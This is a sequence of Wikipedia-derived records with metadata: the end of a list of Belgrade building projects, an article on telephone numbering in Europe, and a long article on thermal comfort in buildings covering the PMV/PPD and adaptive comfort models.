Baric Car part factory of investment of 200 million Euros. Opened in Baric in 2019. Ada Mall Project consists of 34,000 sg m and cost 100 million Euros. Opened in 2019. Central Garden: 200 million euros project started 2015. Project ended in 2019. Big Fashion Karaburma Big CEE invested 70 million Euros. Opened in 2017. Rajiceva Shopping Mall with Mama Shelter hotel. Opened in 2017, investment €80 million. Knez Mihajlova street. IKEA Istok One of the biggest IKEA stores in Europe. Second phase will include additional mall. Opened in 2017. References Economy of Belgrade Belgrade, projects Architectural projects
List of architectural projects in Belgrade
[ "Engineering" ]
1,692
[ "Architecture lists", "Architecture" ]
7,455,543
https://en.wikipedia.org/wiki/Telephone%20numbers%20in%20Europe
Telephone numbers in Europe are managed by the national telecommunications authorities of each country. Most country codes start with 3 and 4, but some countries that by the Copenhagen criteria are considered part of Europe have country codes starting on numbers most common outside of Europe (e.g. Faroe Islands of Denmark have a code starting on number 2, which is most common in Africa). The international access code (dial out code) has been standardized as 00, as recommended by the International Telecommunication Union (ITU). European Economic Area Other European countries/territories † = Disputed state, may not be recognized as an independent state by some or all European Union members. *A variable dialing plan has different dialing procedures for local and long-distance telephone calls. A call within the same city or within an area is dialed only by the subscriber number, while for calls outside the area, the telephone number must be prefixed with the destination area code. A fixed dialing plan requires to dial all digits of the complete telephone number, including any area codes. Harmonized service numbers The following service numbers are harmonized across the European Union: 112 for emergency services 116xxx for (other) harmonized services of social value Single numbering plan (1996 proposal) In 1996, the European Commission proposed the introduction of a single telephone numbering plan, in which all European Union member states would use the country code 3. Calls between member states would no longer require the international access code 00. Instead the digit 1 was proposed for these calls, replaced by the country code 3 for calls from outside the EU. Each country would have a two-digit country code after the 1 or the 3. Calls within each country would not be affected. This proposal would have required states such as Germany, the United Kingdom, Denmark and others, whose country codes began with the digit '4', to return these to the International Telecommunication Union. A Green Paper on the proposal was published, but the disruption and inconvenience of the change was deemed to outweigh any advantages. A disadvantage would have been that every local number beginning with "1" would have had to be changed (except emergency number which would be kept). Another disadvantage would be that people wanting to call France (e.g. Southeast France using +33 4...) using an old number would connect another country like Spain, or people wanting to call Spain (e.g. +34 9...) would end up in e.g. Germany if they use an old number. The EU proposal should not be confused with the European Telephony Numbering Space (ETNS), which uses the country code 388, and was intended to complement, rather than replace, existing national numbering plans. See also Telephone numbering plan National conventions for writing telephone numbers European Union roaming regulations List of country calling codes List of international call prefixes :Category:Telephone numbers by country Notes References External links World Telephone Numbering Guide International telecommunications Telephone numbers Telecommunications in Europe
Telephone numbers in Europe
[ "Mathematics" ]
604
[ "Mathematical objects", "Numbers", "Telephone numbers" ]
7,455,643
https://en.wikipedia.org/wiki/Thermal%20comfort
Thermal comfort is the condition of mind that expresses subjective satisfaction with the thermal environment. The human body can be viewed as a heat engine where food is the input energy. The human body will release excess heat into the environment, so the body can continue to operate. The heat transfer is proportional to temperature difference. In cold environments, the body loses more heat to the environment and in hot environments the body does not release enough heat. Both the hot and cold scenarios lead to discomfort. Maintaining this standard of thermal comfort for occupants of buildings or other enclosures is one of the important goals of HVAC (heating, ventilation, and air conditioning) design engineers. Thermal neutrality is maintained when the heat generated by human metabolism is allowed to dissipate, thus maintaining thermal equilibrium with the surroundings. The main factors that influence thermal neutrality are those that determine heat gain and loss, namely metabolic rate, clothing insulation, air temperature, mean radiant temperature, air speed and relative humidity. Psychological parameters, such as individual expectations, and physiological parameters also affect thermal neutrality. Neutral temperature is the temperature that can lead to thermal neutrality and it may vary greatly between individuals and depending on factors such as activity level, clothing, and humidity. People are highly sensitive to even small differences in environmental temperature. At 24 °C, a difference of 0.38 °C can be detected between the temperature of two rooms. The Predicted Mean Vote (PMV) model stands among the most recognized thermal comfort models. It was developed using principles of heat balance and experimental data collected in a controlled climate chamber under steady state conditions. The adaptive model, on the other hand, was developed based on hundreds of field studies with the idea that occupants dynamically interact with their environment. Occupants control their thermal environment by means of clothing, operable windows, fans, personal heaters, and sun shades. The PMV model can be applied to air-conditioned buildings, while the adaptive model can be applied only to buildings where no mechanical systems have been installed. There is no consensus about which comfort model should be applied for buildings that are partially air-conditioned spatially or temporally. Thermal comfort calculations in accordance with the ANSI/ASHRAE Standard 55, the ISO 7730 Standard and the EN 16798-1 Standard can be freely performed with either the CBE Thermal Comfort Tool for ASHRAE 55, with the Python package pythermalcomfort or with the R package comf. Significance Satisfaction with the thermal environment is important because thermal conditions are potentially life-threatening for humans if the core body temperature reaches conditions of hyperthermia, above 37.5–38.3 °C (99.5–100.9 °F), or hypothermia, below 35.0 °C (95.0 °F). Buildings modify the conditions of the external environment and reduce the effort that the human body needs to do in order to stay stable at a normal human body temperature, important for the correct functioning of human physiological processes. The Roman writer Vitruvius actually linked this purpose to the birth of architecture. David Linden also suggests that the reason why we associate tropical beaches with paradise is because in those environments is where human bodies need to do less metabolic effort to maintain their core temperature. Temperature not only supports human life; coolness and warmth have also become in different cultures a symbol of protection, community and even the sacred. In building science studies, thermal comfort has been related to productivity and health. Office workers who are satisfied with their thermal environment are more productive. The combination of high temperature and high relative humidity reduces thermal comfort and indoor air quality. Although a single static temperature can be comfortable, people are attracted by thermal changes, such as campfires and cool pools. Thermal pleasure is caused by varying thermal sensations from a state of unpleasantness to a state of pleasantness, and the scientific term for it is positive thermal alliesthesia. From a state of thermal neutrality or comfort any change will be perceived as unpleasant. This challenges the assumption that mechanically controlled buildings should deliver uniform temperatures and comfort, if it is at the cost of excluding thermal pleasure. Influencing factors Since there are large variations from person to person in terms of physiological and psychological satisfaction, it is hard to find an optimal temperature for everyone in a given space. Laboratory and field data have been collected to define conditions that will be found comfortable for a specified percentage of occupants. There are numerous factors that directly affect thermal comfort that can be grouped in two categories: Personal factors – characteristics of the occupants such as metabolic rate and clothing level Environmental factors – which are conditions of the thermal environment, specifically air temperature, mean radiant temperature, air speed and humidity Even if all these factors may vary with time, standards usually refer to a steady state to study thermal comfort, just allowing limited temperature variations. Personal factors Metabolic rate People have different metabolic rates that can fluctuate due to activity level and environmental conditions. ASHRAE 55-2017 defines metabolic rate as the rate of transformation of chemical energy into heat and mechanical work by metabolic activities of an individual, per unit of skin surface area. Metabolic rate is expressed in units of met, equal to 58.2 W/m² (18.4 Btu/h·ft²). One met is equal to the energy produced per unit surface area of an average person seated at rest. ASHRAE 55 provides a table of metabolic rates for a variety of activities. Some common values are 0.7 met for sleeping, 1.0 met for a seated and quiet position, 1.2–1.4 met for light activities standing, 2.0 met or more for activities that involve movement, walking, lifting heavy loads or operating machinery. For intermittent activity, the standard states that it is permissible to use a time-weighted average metabolic rate if individuals are performing activities that vary over a period of one hour or less. For longer periods, different metabolic rates must be considered. According to ASHRAE Handbook of Fundamentals, estimating metabolic rates is complex, and for levels above 2 or 3 met – especially if there are various ways of performing such activities – the accuracy is low. Therefore, the standard is not applicable for activities with an average level higher than 2 met. Met values can also be determined more accurately than the tabulated ones, using an empirical equation that takes into account the rate of respiratory oxygen consumption and carbon dioxide production. Another physiological yet less accurate method is related to the heart rate, since there is a relationship between the latter and oxygen consumption. The Compendium of Physical Activities is used by physicians to record physical activities. It has a different definition of met that is the ratio of the metabolic rate of the activity in question to a resting metabolic rate. As the formulation of the concept is different from the one that ASHRAE uses, these met values cannot be used directly in PMV calculations, but it opens up a new way of quantifying physical activities. Food and drink habits may have an influence on metabolic rates, which indirectly influences thermal preferences. These effects may change depending on food and drink intake. Body shape is another factor that affects metabolic rate and hence thermal comfort. Heat dissipation depends on body surface area. The surface area of an average person is 1.8 m2 (19 ft2). A tall and skinny person has a larger surface-to-volume ratio, can dissipate heat more easily, and can tolerate higher temperatures more than a person with a rounded body shape. Clothing insulation The amount of thermal insulation worn by a person has a substantial impact on thermal comfort, because it influences the heat loss and consequently the thermal balance. Layers of insulating clothing prevent heat loss and can either help keep a person warm or lead to overheating. Generally, the thicker the garment is, the greater insulating ability it has. Depending on the type of material the clothing is made out of, air movement and relative humidity can decrease the insulating ability of the material. 1 clo is equal to 0.155 m2·K/W (0.88 °F·ft2·h/Btu). This corresponds to trousers, a long sleeved shirt, and a jacket. Clothing insulation values for other common ensembles or single garments can be found in ASHRAE 55. Skin wetness Skin wetness is defined as "the proportion of the total skin surface area of the body covered with sweat". The wetness of skin in different areas also affects perceived thermal comfort. Humidity can increase wetness in different areas of the body, leading to a perception of discomfort. This is usually localized in different parts of the body, and local thermal comfort limits for skin wetness differ by locations of the body. The extremities are much more sensitive to thermal discomfort from wetness than the trunk of the body. Although local thermal discomfort can be caused by wetness, the thermal comfort of the whole body will not be affected by the wetness of certain parts. Environmental factors Air temperature The air temperature is the average temperature of the air surrounding the occupant, with respect to location and time. According to ASHRAE 55 standard, the spatial average takes into account the ankle, waist and head levels, which vary for seated or standing occupants. The temporal average is based on three-minutes intervals with at least 18 equally spaced points in time. Air temperature is measured with a dry-bulb thermometer and for this reason it is also known as dry-bulb temperature. Mean radiant temperature The radiant temperature is related to the amount of radiant heat transferred from a surface, and it depends on the material's ability to absorb or emit heat, or its emissivity. The mean radiant temperature depends on the temperatures and emissivities of the surrounding surfaces as well as the view factor, or the amount of the surface that is “seen” by the object. So the mean radiant temperature experienced by a person in a room with the sunlight streaming in varies based on how much of their body is in the sun. Air speed Air speed is defined as the rate of air movement at a point, without regard to direction. According to ANSI/ASHRAE Standard 55, it is the average speed of the air surrounding a representative occupant, with respect to location and time. The spatial average is for three heights as defined for average air temperature. For an occupant moving in a space the sensors shall follow the movements of the occupant. The air speed is averaged over an interval not less than one and not greater than three minutes. Variations that occur over a period greater than three minutes shall be treated as multiple different air speeds. Relative humidity Relative humidity (RH) is the ratio of the amount of water vapor in the air to the amount of water vapor that the air could hold at the specific temperature and pressure. While the human body has thermoreceptors in the skin that enable perception of temperature, relative humidity is detected indirectly. Sweating is an effective heat loss mechanism that relies on evaporation from the skin. However at high RH, the air has close to the maximum water vapor that it can hold, so evaporation, and therefore heat loss, is decreased. On the other hand, very dry environments (RH < 20–30%) are also uncomfortable because of their effect on the mucous membranes. The recommended level of indoor humidity is in the range of 30–60% in air conditioned buildings, but new standards such as the adaptive model allow lower and higher humidity, depending on the other factors involved in thermal comfort. Recently, the effects of low relative humidity and high air velocity were tested on humans after bathing. Researchers found that low relative humidity engendered thermal discomfort as well as the sensation of dryness and itching. It is recommended to keep relative humidity levels higher in a bathroom than other rooms in the house for optimal conditions. Various types of apparent temperature have been developed to combine air temperature and air humidity. For higher temperatures, there are quantitative scales, such as the heat index. For lower temperatures, a related interplay was identified only qualitatively: High humidity and low temperatures cause the air to feel chilly. Cold air with high relative humidity "feels" colder than dry air of the same temperature because high humidity in cold weather increases the conduction of heat from the body. There has been controversy over why damp cold air feels colder than dry cold air. Some believe it is because when the humidity is high, our skin and clothing become moist and are better conductors of heat, so there is more cooling by conduction. The influence of humidity can be exacerbated with the combined use of fans (forced convection cooling). Natural ventilation Many buildings use an HVAC unit to control their thermal environment. Other buildings are naturally ventilated (or would have cross ventilation) and do not rely on mechanical systems to provide thermal comfort. Depending on the climate, this can drastically reduce energy consumption. It is sometimes seen as a risk, though, since indoor temperatures can be too extreme if the building is poorly designed. Properly designed, naturally ventilated buildings keep indoor conditions within the range where opening windows and using fans in the summer, and wearing extra clothing in the winter, can keep people thermally comfortable. Models and indices There are several different models or indices that can be used to assess thermal comfort conditions indoors as described below. PMV/PPD method The PMV/PPD model was developed by P.O. Fanger using heat-balance equations and empirical studies about skin temperature to define comfort. Standard thermal comfort surveys ask subjects about their thermal sensation on a seven-point scale from cold (−3) to hot (+3). Fanger's equations are used to calculate the predicted mean vote (PMV) of a group of subjects for a particular combination of air temperature, mean radiant temperature, relative humidity, air speed, metabolic rate, and clothing insulation. PMV equal to zero is representing thermal neutrality, and the comfort zone is defined by the combinations of the six parameters for which the PMV is within the recommended limits . Although predicting the thermal sensation of a population is an important step in determining what conditions are comfortable, it is more useful to consider whether or not people will be satisfied. Fanger developed another equation to relate the PMV to the Predicted Percentage of Dissatisfied (PPD). This relation was based on studies that surveyed subjects in a chamber where the indoor conditions could be precisely controlled. The PMV/PPD model is applied globally but does not directly take into account the adaptation mechanisms and outdoor thermal conditions. ASHRAE Standard 55-2017 uses the PMV model to set the requirements for indoor thermal conditions. It requires that at least 80% of the occupants be satisfied. The CBE Thermal Comfort Tool for ASHRAE 55 allows users to input the six comfort parameters to determine whether a certain combination complies with ASHRAE 55. The results are displayed on a psychrometric or a temperature-relative humidity chart and indicate the ranges of temperature and relative humidity that will be comfortable with the given the values input for the remaining four parameters. The PMV/PPD model has a low prediction accuracy. Using the world largest thermal comfort field survey database, the accuracy of PMV in predicting occupant's thermal sensation was only 34%, meaning that the thermal sensation is correctly predicted one out of three times. The PPD was overestimating subject's thermal unacceptability outside the thermal neutrality ranges (-1≤PMV≤1). The PMV/PPD accuracy varies strongly between ventilation strategies, building types and climates. Elevated air speed method ASHRAE 55 2013 accounts for air speeds above separately than the baseline model. Because air movement can provide direct cooling to people, particularly if they are not wearing much clothing, higher temperatures can be more comfortable than the PMV model predicts. Air speeds up to are allowed without local control, and 1.2 m/s is possible with local control. This elevated air movement increases the maximum temperature for an office space in the summer to 30 °C from 27.5 °C (). Virtual Energy for Thermal Comfort "Virtual Energy for Thermal Comfort" is the amount of energy that will be required to make a non-air-conditioned building relatively as comfortable as one with air-conditioning. This is based on the assumption that the home will eventually install air-conditioning or heating. Passive design improves thermal comfort in a building, thus reducing demand for heating or cooling. In many developing countries, however, most occupants do not currently heat or cool, due to economic constraints, as well as climate conditions which border lines comfort conditions such as cold winter nights in Johannesburg (South Africa) or warm summer days in San Jose, Costa Rica. At the same time, as incomes rise, there is a strong tendency to introduce cooling and heating systems. If we recognize and reward passive design features that improve thermal comfort today, we diminish the risk of having to install HVAC systems in the future, or we at least ensure that such systems will be smaller and less frequently used. Or in case the heating or cooling system is not installed due to high cost, at least people should not suffer from discomfort indoors. To provide an example, in San Jose, Costa Rica, if a house were being designed with high level of glazing and small opening sizes, the internal temperature would easily rise above and natural ventilation would not be enough to remove the internal heat gains and solar gains. This is why Virtual Energy for Comfort is important. World Bank's assessment tool the EDGE software (Excellence in Design for Greater Efficiencies) illustrates the potential issues with discomfort in buildings and has created the concept of Virtual Energy for Comfort which provides for a way to present potential thermal discomfort. This approach is used to award for design solutions which improves thermal comfort even in a fully free running building. Despite the inclusion of requirements for overheating in CIBSE, overcooling has not been assessed. However, overcooling can be an issue, mainly in the developing world, for example in cities such as Lima (Peru), Bogota, and Delhi, where cooler indoor temperatures can occur frequently. This may be a new area for research and design guidance for reduction of discomfort. Cooling Effect ASHRAE 55-2017 defines the Cooling Effect (CE) at elevated air speed (above ) as the value that, when subtracted from both the air temperature and the mean radiant temperature, yields the same SET value under still air (0.1 m/s) as in the first SET calculation under elevated air speed. The CE can be used to determine the PMV adjusted for an environment with elevated air speed using the adjusted temperature, the adjusted radiant temperature and still air (). Where the adjusted temperatures are equal to the original air and mean radiant temperatures minus the CE. Local thermal discomfort Avoiding local thermal discomfort, whether caused by a vertical air temperature difference between the feet and the head, by an asymmetric radiant field, by local convective cooling (draft), or by contact with a hot or cold floor, is essential to providing acceptable thermal comfort. People are generally more sensitive to local discomfort when their thermal sensation is cooler than neutral, while they are less sensitive to it when their body is warmer than neutral. Radiant temperature asymmetry Large differences in the thermal radiation of the surfaces surrounding a person may cause local discomfort or reduce acceptance of the thermal conditions. ASHRAE Standard 55 sets limits on the allowable temperature differences between various surfaces. Because people are more sensitive to some asymmetries than others, for example that of a warm ceiling versus that of hot and cold vertical surfaces, the limits depend on which surfaces are involved. The ceiling is not allowed to be more than + warmer, whereas a wall may be up to + warmer than the other surfaces. Draft While air movement can be pleasant and provide comfort in some circumstances, it is sometimes unwanted and causes discomfort. This unwanted air movement is called "draft" and is most prevalent when the thermal sensation of the whole body is cool. People are most likely to feel a draft on uncovered body parts such as their head, neck, shoulders, ankles, feet, and legs, but the sensation also depends on the air speed, air temperature, activity, and clothing. Floor surface temperature Floors that are too warm or too cool may cause discomfort, depending on footwear. ASHRAE 55 recommends that floor temperatures stay in the range of in spaces where occupants will be wearing lightweight shoes. Standard effective temperature Standard effective temperature (SET) is a model of human response to the thermal environment. Developed by A.P. Gagge and accepted by ASHRAE in 1986, it is also referred to as the Pierce Two-Node model. Its calculation is similar to PMV because it is a comprehensive comfort index based on heat-balance equations that incorporates the personal factors of clothing and metabolic rate. Its fundamental difference is it takes a two-node method to represent human physiology in measuring skin temperature and skin wettedness. The SET index is defined as the equivalent dry bulb temperature of an isothermal environment at 50% relative humidity in which a subject, while wearing clothing standardized for activity concerned, would have the same heat stress (skin temperature) and thermoregulatory strain (skin wettedness) as in the actual test environment. Research has tested the model against experimental data and found it tends to overestimate skin temperature and underestimate skin wettedness. Fountain and Huizenga (1997) developed a thermal sensation prediction tool that computes SET. The SET index can also be calculated using either the CBE Thermal Comfort Tool for ASHRAE 55, the Python package pythermalcomfort, or the R package comf. Adaptive comfort model The adaptive model is based on the idea that outdoor climate might be used as a proxy of indoor comfort because of a statistically significant correlation between them. The adaptive hypothesis predicts that contextual factors, such as having access to environmental controls, and past thermal history can influence building occupants' thermal expectations and preferences. Numerous researchers have conducted field studies worldwide in which they survey building occupants about their thermal comfort while taking simultaneous environmental measurements. Analyzing a database of results from 160 of these buildings revealed that occupants of naturally ventilated buildings accept and even prefer a wider range of temperatures than their counterparts in sealed, air-conditioned buildings because their preferred temperature depends on outdoor conditions. These results were incorporated in the ASHRAE 55-2004 standard as the adaptive comfort model. The adaptive chart relates indoor comfort temperature to prevailing outdoor temperature and defines zones of 80% and 90% satisfaction. The ASHRAE-55 2010 Standard introduced the prevailing mean outdoor temperature as the input variable for the adaptive model. It is based on the arithmetic average of the mean daily outdoor temperatures over no fewer than 7 and no more than 30 sequential days prior to the day in question. It can also be calculated by weighting the temperatures with different coefficients, assigning increasing importance to the most recent temperatures. In case this weighting is used, there is no need to respect the upper limit for the subsequent days. In order to apply the adaptive model, there should be no mechanical cooling system for the space, occupants should be engaged in sedentary activities with metabolic rates of 1–1.3 met, and a prevailing mean temperature of . This model applies especially to occupant-controlled, natural-conditioned spaces, where the outdoor climate can actually affect the indoor conditions and so the comfort zone. In fact, studies by de Dear and Brager showed that occupants in naturally ventilated buildings were tolerant of a wider range of temperatures. This is due to both behavioral and physiological adjustments, since there are different types of adaptive processes. ASHRAE Standard 55-2010 states that differences in recent thermal experiences, changes in clothing, availability of control options, and shifts in occupant expectations can change people's thermal responses. Adaptive models of thermal comfort are implemented in other standards, such as European EN 15251 and ISO 7730 standard. While the exact derivation methods and results are slightly different from the ASHRAE 55 adaptive standard, they are substantially the same. A larger difference is in applicability. The ASHRAE adaptive standard only applies to buildings without mechanical cooling installed, while EN15251 can be applied to mixed-mode buildings, provided the system is not running. There are basically three categories of thermal adaptation, namely: behavioral, physiological, and psychological. Psychological adaptation An individual's comfort level in a given environment may change and adapt over time due to psychological factors. Subjective perception of thermal comfort may be influenced by the memory of previous experiences. Habituation takes place when repeated exposure moderates future expectations, and responses to sensory input. This is an important factor in explaining the difference between field observations and PMV predictions (based on the static model) in naturally ventilated buildings. In these buildings, the relationship with the outdoor temperatures has been twice as strong as predicted. Psychological adaptation is subtly different in the static and adaptive models. Laboratory tests of the static model can identify and quantify non-heat transfer (psychological) factors that affect reported comfort. The adaptive model is limited to reporting differences (called psychological) between modeled and reported comfort. Thermal comfort as a "condition of mind" is defined in psychological terms. Among the factors that affect the condition of mind (in the laboratory) are a sense of control over the temperature, knowledge of the temperature and the appearance of the (test) environment. A thermal test chamber that appeared residential "felt" warmer than one which looked like the inside of a refrigerator. Physiological adaptation The body has several thermal adjustment mechanisms to survive in drastic temperature environments. In a cold environment the body utilizes vasoconstriction; which reduces blood flow to the skin, skin temperature and heat dissipation. In a warm environment, vasodilation will increase blood flow to the skin, heat transport, and skin temperature and heat dissipation. If there is an imbalance despite the vasomotor adjustments listed above, in a warm environment sweat production will start and provide evaporative cooling. If this is insufficient, hyperthermia will set in, body temperature may reach , and heat stroke may occur. In a cold environment, shivering will start, involuntarily forcing the muscles to work and increasing the heat production by up to a factor of 10. If equilibrium is not restored, hypothermia can set in, which can be fatal. Long-term adjustments to extreme temperatures, of a few days to six months, may result in cardiovascular and endocrine adjustments. A hot climate may create increased blood volume, improving the effectiveness of vasodilation, enhanced performance of the sweat mechanism, and the readjustment of thermal preferences. In cold or underheated conditions, vasoconstriction can become permanent, resulting in decreased blood volume and increased body metabolic rate. Behavioral adaptation In naturally ventilated buildings, occupants take numerous actions to keep themselves comfortable when the indoor conditions drift towards discomfort. Operating windows and fans, adjusting blinds/shades, changing clothing, and consuming food and drinks are some of the common adaptive strategies. Among these, adjusting windows is the most common. Those occupants who take these sorts of actions tend to feel cooler at warmer temperatures than those who do not. The behavioral actions significantly influence energy simulation inputs, and researchers are developing behavior models to improve the accuracy of simulation results. For example, there are many window-opening models that have been developed to date, but there is no consensus over the factors that trigger window opening. People might adapt to seasonal heat by becoming more nocturnal, doing physical activity and even conducting business at night. Specificity and sensitivity Individual differences The thermal sensitivity of an individual is quantified by the descriptor FS, which takes on higher values for individuals with lower tolerance to non-ideal thermal conditions. This group includes pregnant women, the disabled, as well as individuals whose age is below fourteen or above sixty, which is considered the adult range. Existing literature provides consistent evidence that sensitivity to hot and cold surfaces usually declines with age. There is also some evidence of a gradual reduction in the effectiveness of the body in thermo-regulation after the age of sixty. This is mainly due to a more sluggish response of the counteraction mechanisms in lower parts of the body that are used to maintain the core temperature of the body at ideal values. Seniors prefer warmer temperatures than young adults (76 vs 72 degrees F or 24.4 vs 22.2 Celsius). Situational factors include the health, psychological, sociological, and vocational activities of the persons. Biological sex differences While thermal comfort preferences between sexes seem to be small, there are some average differences. Studies have found males on average report discomfort due to rises in temperature much earlier than females. Males on average also estimate higher levels of their sensation of discomfort than females. One recent study tested males and females in the same cotton clothing, performing mental jobs while using a dial vote to report their thermal comfort to the changing temperature. Many times, females preferred higher temperatures than males. But while females tend to be more sensitive to temperatures, males tend to be more sensitive to relative-humidity levels. An extensive field study was carried out in naturally ventilated residential buildings in Kota Kinabalu, Sabah, Malaysia. This investigation explored the sexes thermal sensitivity to the indoor environment in non-air-conditioned residential buildings. Multiple hierarchical regression for categorical moderator was selected for data analysis; the result showed that as a group females were slightly more sensitive than males to the indoor air temperatures, whereas, under thermal neutrality, it was found that males and females have similar thermal sensation. Regional differences In different areas of the world, thermal comfort needs may vary based on climate. In China the climate has hot humid summers and cold winters, causing a need for efficient thermal comfort. Energy conservation in relation to thermal comfort has become a large issue in China in the last several decades due to rapid economic and population growth. Researchers are now looking into ways to heat and cool buildings in China for lower costs and also with less harm to the environment. In tropical areas of Brazil, urbanization is creating urban heat islands (UHI). These are urban areas that have risen over the thermal comfort limits due to a large influx of people and only drop within the comfortable range during the rainy season. Urban heat islands can occur over any urban city or built-up area with the correct conditions. In the hot, humid region of Saudi Arabia, the issue of thermal comfort has been important in mosques; because they are very large open buildings that are used only intermittently (very busy for the noon prayer on Fridays) it is hard to ventilate them properly. The large size requires a large amount of ventilation, which requires a lot of energy since the buildings are used only for short periods of time. Temperature regulation in mosques is a challenge due to the intermittent demand, leading to many mosques being either too hot or too cold. The stack effect also comes into play due to their large size and creates a large layer of hot air above the people in the mosque. New designs have placed the ventilation systems lower in the buildings to provide more temperature control at ground level. New monitoring steps are also being taken to improve efficiency. Thermal stress The concept of thermal comfort is closely related to thermal stress. This attempts to predict the impact of solar radiation, air movement, and humidity for military personnel undergoing training exercises or athletes during competitive events. Several thermal stress indices have been proposed, such as the Predicted Heat Strain (PHS) or the humidex. Generally, humans do not perform well under thermal stress. People's performances under thermal stress is about 11% lower than their performance at normal thermal wet conditions. Also, human performance in relation to thermal stress varies greatly by the type of task which the individual is completing. Some of the physiological effects of thermal heat stress include increased blood flow to the skin, sweating, and increased ventilation. Predicted Heat Strain (PHS) The PHS model, developed by the International Organization for Standardization (ISO) committee, allows the analytical evaluation of the thermal stress experienced by a working subject in a hot environment. It describes a method for predicting the sweat rate and the internal core temperature that the human body will develop in response to the working conditions. The PHS is calculated as a function of several physical parameters, consequently it makes it possible to determine which parameter or group of parameters should be modified, and to what extent, in order to reduce the risk of physiological strains. The PHS model does not predict the physiological response of an individual subject, but only considers standard subjects in good health and fit for the work they perform. The PHS can be determined using either the Python package pythermalcomfort or the R package comf. American Conference on Governmental Industrial Hygienists (ACGIH) Action Limits and Threshold Limit Values ACGIH has established Action Limits and Threshold Limit Values for heat stress based upon the estimated metabolic rate of a worker and the environmental conditions the worker is subjected to. This methodology has been adopted by the Occupational Safety and Health Administration (OSHA) as an effective method of assesing heat stress within workplaces. Research The factors affecting thermal comfort were explored experimentally in the 1970s. Many of these studies led to the development and refinement of ASHRAE Standard 55 and were performed at Kansas State University by Ole Fanger and others. Perceived comfort was found to be a complex interaction of these variables. It was found that the majority of individuals would be satisfied by an ideal set of values. As the range of values deviated progressively from the ideal, fewer and fewer people were satisfied. This observation could be expressed statistically as the percent of individuals who expressed satisfaction by comfort conditions and the predicted mean vote (PMV). This approach was challenged by the adaptive comfort model, developed from the ASHRAE 884 project, which revealed that occupants were comfortable in a broader range of temperatures. This research is applied to create Building Energy Simulation (BES) programs for residential buildings. Residential buildings in particular can vary much more in thermal comfort than public and commercial buildings. This is due to their smaller size, the variations in clothing worn, and different uses of each room. The main rooms of concern are bathrooms and bedrooms. Bathrooms need to be at a temperature comfortable for a human with or without clothing. Bedrooms are of importance because they need to accommodate different levels of clothing and also different metabolic rates of people asleep or awake. Discomfort hours is a common metric used to evaluate the thermal performance of a space. Thermal comfort research in clothing is currently being done by the military. New air-ventilated garments are being researched to improve evaporative cooling in military settings. Some models are being created and tested based on the amount of cooling they provide. In the last twenty years, researchers have also developed advanced thermal comfort models that divide the human body into many segments, and predict local thermal discomfort by considering heat balance. This has opened up a new arena of thermal comfort modeling that aims at heating/cooling selected body parts. Another area of study is the hue-heat hypothesis that states that an environment with warm colors (red, orange yellow hues) will feel warmer in terms of temperature and comfort, while an environment with cold colors (blue, green hues) will feel cooler. The hue-heat hypothesis has both been investigated scientifically and ingrained in popular culture in the terms warm and cold colors Medical environments Whenever the studies referenced tried to discuss the thermal conditions for different groups of occupants in one room, the studies ended up simply presenting comparisons of thermal comfort satisfaction based on the subjective studies. No study tried to reconcile the different thermal comfort requirements of different types of occupants who compulsorily must stay in one room. Therefore, it looks to be necessary to investigate the different thermal conditions required by different groups of occupants in hospitals to reconcile their different requirements in this concept. To reconcile the differences in the required thermal comfort conditions it is recommended to test the possibility of using different ranges of local radiant temperature in one room via a suitable mechanical system. Although different researches are undertaken on thermal comfort for patients in hospitals, it is also necessary to study the effects of thermal comfort conditions on the quality and the quantity of healing for patients in hospitals. There are also original researches that show the link between thermal comfort for staff and their levels of productivity, but no studies have been produced individually in hospitals in this field. Therefore, research for coverage and methods individually for this subject is recommended. Also research in terms of cooling and heating delivery systems for patients with low levels of immune-system protection (such as HIV patients, burned patients, etc.) are recommended. There are important areas, which still need to be focused on including thermal comfort for staff and its relation with their productivity, using different heating systems to prevent hypothermia in the patient and to improve the thermal comfort for hospital staff simultaneously. Finally, the interaction between people, systems and architectural design in hospitals is a field in which require further work needed to improve the knowledge of how to design buildings and systems to reconcile many conflicting factors for the people occupying these buildings. Personal comfort systems Personal comfort systems (PCS) refer to devices or systems which heat or cool a building occupant personally. This concept is best appreciated in contrast to central HVAC systems which have uniform temperature settings for extensive areas. Personal comfort systems include fans and air diffusers of various kinds (e.g. desk fans, nozzles and slot diffusers, overhead fans, high-volume low-speed fans etc.) and personalized sources of radiant or conductive heat (footwarmers, legwarmers, hot water bottles etc.). PCS has the potential to satisfy individual comfort requirements much better than current HVAC systems, as interpersonal differences in thermal sensation due to age, sex, body mass, metabolic rate, clothing and thermal adaptation can amount to an equivalent temperature variation of 2–5 °C (3,6–9 °F), which is impossible for a central, uniform HVAC system to cater to. Besides, research has shown that the perceived ability to control one's thermal environment tends to widen one's range of tolerable temperatures. Traditionally, PCS devices have been used in isolation from one another. However, it has been proposed by Andersen et al. (2016) that a network of PCS devices which generate well-connected microzones of thermal comfort, and report real-time occupant information and respond to programmatic actuation requests (e.g. a party, a conference, a concert etc.) can combine with occupant-aware building applications to enable new methods of comfort maximization. See also ASHRAE ANSI/ASHRAE Standard 55 Air conditioning Building insulation Cold and heat adaptations in humans Heat stress Mean radiant temperature Mahoney tables Povl Ole Fanger Psychrometrics Ralph G. Nevins Room air distribution Room temperature Ventilative cooling References Further reading Thermal Comfort, Fanger, P. O, Danish Technical Press, 1970 (Republished by McGraw-Hill, New York, 1973). Thermal Comfort chapter, Fundamentals volume of the ASHRAE Handbook, ASHRAE, Inc., Atlanta, GA, 2005. Godish, T. Indoor Environmental Quality. Boca Raton: CRC Press, 2001. Bessoudo, M. Building Facades and Thermal Comfort: The impacts of climate, solar shading, and glazing on the indoor thermal environment. VDM Verlag, 2008 Communications in development and assembly of textile products, Open Access Journal, ISSN 2701-939X Heat Stress, National Institute for Occupational Safety and Health. Cold Stress, National Institute for Occupational Safety and Health. Heating, ventilation, and air conditioning Building engineering Temperature Heat transfer Environmental psychology Occupational safety and health
Thermal comfort
[ "Physics", "Chemistry", "Engineering", "Environmental_science" ]
8,072
[ "Transport phenomena", "Scalar physical quantities", "Thermodynamic properties", "Temperature", "Physical phenomena", "Physical quantities", "Heat transfer", "Environmental psychology", "Building engineering", "SI base quantities", "Intensive quantities", "Civil engineering", "Thermodynamics...
7,455,679
https://en.wikipedia.org/wiki/Telephone%20numbers%20in%20Asia
